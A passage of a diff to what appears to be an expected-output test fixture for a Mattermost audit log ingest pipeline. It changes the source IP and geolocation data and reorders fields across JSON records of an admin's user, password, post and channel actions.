Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchUser", "category": [ @@ -500,6 +511,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/me/patch", + "original": "/api/v4/users/me/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -512,9 +527,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:20:53.063Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -528,45 +558,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password", - "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:20:53.063Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209493245Z", - "original": "{\"timestamp\":\"2021-12-04 23:20:53.063 Z\",\"event\":\"updatePassword\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543285998Z", + "original": "{\"timestamp\":\"2021-12-04 23:20:53.063 
Z\",\"event\":\"updatePassword\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updatePassword", "category": [ @@ -589,6 +603,10 @@ "id": "ag99yu4i1if63jrui63tsmq57y" } }, + "url": { + "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password", + "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/password" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -601,9 +619,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:28:18.032Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -617,45 +650,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "as": { - "number": 721, - "organization": { - "name": "DoD Network Information Center" - } - }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences", - "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:28:18.032Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "lon": 15.6167, + "lat": 58.4167 + } + }, + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209498456Z", - "original": "{\"timestamp\":\"2021-12-04 23:28:18.032 Z\",\"event\":\"updatePreferences\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543287384Z", + "original": "{\"timestamp\":\"2021-12-04 23:28:18.032 
Z\",\"event\":\"updatePreferences\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updatePreferences", "category": [ @@ -670,6 +687,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences", + "original": "/api/v4/users/ag99yu4i1if63jrui63tsmq57y/preferences" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -682,9 +703,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-04T23:28:19.342Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { 
@@ -710,45 +746,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/posts", - "original": "/api/v4/posts" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-04T23:28:19.342Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209503901Z", - "original": "{\"timestamp\":\"2021-12-04 23:28:19.342 Z\",\"event\":\"createPost\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/posts\",\"post\":{\"id\":\"gbuu48qc17bbjq4xdg5ciq4iao\",\"channel_id\":\"hkmb8e53ijdkbc8agbpuxe8qxc\",\"type\":\"\",\"pinned\":false},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543288767Z", + "original": "{\"timestamp\":\"2021-12-04 23:28:19.342 
Z\",\"event\":\"createPost\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/posts\",\"post\":{\"id\":\"gbuu48qc17bbjq4xdg5ciq4iao\",\"channel_id\":\"hkmb8e53ijdkbc8agbpuxe8qxc\",\"type\":\"\",\"pinned\":false},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createPost", "category": [ @@ -762,6 +782,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/posts", + "original": "/api/v4/posts" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -774,9 +798,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:01:23.974Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -800,45 +839,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels", - "original": "/api/v4/channels" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:01:23.974Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209509119Z", - "original": "{\"timestamp\":\"2021-12-05 00:01:23.974 Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543290184Z", + "original": "{\"timestamp\":\"2021-12-05 00:01:23.974 
Z\",\"event\":\"createChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "createChannel", "category": [ @@ -852,6 +875,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels", + "original": "/api/v4/channels" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -864,9 +891,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:01:48.946Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "patch": { 
@@ -895,45 +937,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:01:48.946Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209544031Z", - "original": "{\"timestamp\":\"2021-12-05 00:01:48.946 Z\",\"event\":\"patchChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"patch\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543291555Z", + "original": "{\"timestamp\":\"2021-12-05 00:01:48.946 
Z\",\"event\":\"patchChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"patch\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchChannel", "category": [ @@ -947,6 +973,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -959,9 +989,24 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T00:01:52.914Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -985,45 +1030,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:01:52.914Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209552229Z", - "original": "{\"timestamp\":\"2021-12-05 00:01:52.914 Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543293159Z", + "original": "{\"timestamp\":\"2021-12-05 00:01:52.914 
Z\",\"event\":\"deleteChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "deleteChannel", "category": [ @@ -1037,6 +1066,10 @@ "user": { "id": "ag99yu4i1if63jrui63tsmq57y" }, + "url": { + "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe", + "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -1049,7 +1082,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "mattermost": { @@ -1075,22 +1111,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "error": { "code": "api.channel.delete_channel.deleted.app_error" @@ -1111,7 +1150,7 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "http": { 
@@ -1120,8 +1159,8 @@ } }, "event": { - "ingested": "2021-12-08T15:26:55.209557854Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:01.482 Z\",\"event\":\"deleteChannel\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"api.channel.delete_channel.deleted.app_error\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543294566Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:01.482 Z\",\"event\":\"deleteChannel\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe\",\"channeld\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"api.channel.delete_channel.deleted.app_error\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "deleteChannel", "category": [ 
@@ -1173,22 +1212,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "error": { "code": "app.channel.update.bad_id" @@ -1209,7 +1251,7 @@ "ag99yu4i1if63jrui63tsmq57y" ], "ip": [ - "55.33.6.7" + "89.160.20.156" ] }, "http": { 
@@ -1218,8 +1260,8 @@ } }, "event": { - "ingested": "2021-12-08T15:26:55.209563426Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:09.835 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"app.channel.update.bad_id\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543296002Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:09.835 Z\",\"event\":\"convertChannelToPrivate\",\"status\":\"fail\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/convert\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"code\":400,\"err\":\"app.channel.update.bad_id\",\"user\":{\"id\":\"ag99yu4i1if63jrui63tsmq57y\",\"name\":\"admin\",\"roles\":\"system_admin system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "convertChannelToPrivate", "category": [ @@ -1256,6 +1298,18 @@ } }, { + "@timestamp": "2021-12-05T00:02:25.202Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "channel": { 
@@ -1279,45 +1333,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore", - "original": "/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T00:02:25.202Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209568764Z", - "original": "{\"timestamp\":\"2021-12-05 00:02:25.202 Z\",\"event\":\"restoreChannel\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"mbz8h4gkxp8g3yzanizcpg43dc\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/channels/cje83zmowjds9ywg6m4jf8w7oe/restore\",\"channel\":{\"id\":\"cje83zmowjds9ywg6m4jf8w7oe\",\"name\":\"public-channel\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543297343Z", + "original": "{\"timestamp\":\"2021-12-05 00:02:25.202 
